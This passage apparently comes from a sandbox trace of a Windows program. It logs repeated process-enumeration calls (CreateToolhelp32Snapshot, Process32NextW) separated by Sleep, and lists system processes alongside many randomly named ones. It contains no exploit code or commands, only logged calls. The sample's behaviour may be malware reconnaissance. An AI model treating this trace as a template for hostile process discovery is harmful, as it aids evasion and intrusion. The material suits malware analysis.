th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.349] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0117.350] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.351] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.352] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0117.400] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.401] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0117.403] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0117.404] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0117.405] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0117.406] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.407] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0117.408] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0117.409] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0117.410] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0117.412] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0117.413] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0117.414] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0117.416] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0117.417] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0117.419] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0117.420] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0117.422] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0117.423] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0117.425] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0117.426] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0117.427] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0117.429] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0117.430] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0117.432] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0117.433] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0117.435] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0117.436] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0117.437] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0117.439] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) 
returned 1 [0117.440] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0117.441] CloseHandle (hObject=0xbc) returned 1 [0117.441] Sleep (dwMilliseconds=0x12c) [0118.029] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0118.039] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0118.040] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0118.041] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0118.042] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0118.043] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0118.044] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0118.044] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0118.045] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0118.046] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0118.047] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0118.048] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.049] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.050] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.051] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.052] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.053] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0118.054] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.055] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.056] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0118.057] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.059] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0118.060] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0118.258] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0118.260] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0118.261] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0118.263] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0118.264] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0118.266] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0118.267] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0118.269] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0118.270] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0118.272] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0118.284] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0118.285] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 
| out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0118.287] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0118.288] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0118.290] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0118.291] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0118.293] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0118.294] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0118.296] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0118.297] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0118.299] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0118.300] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0118.382] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0118.384] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0118.385] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 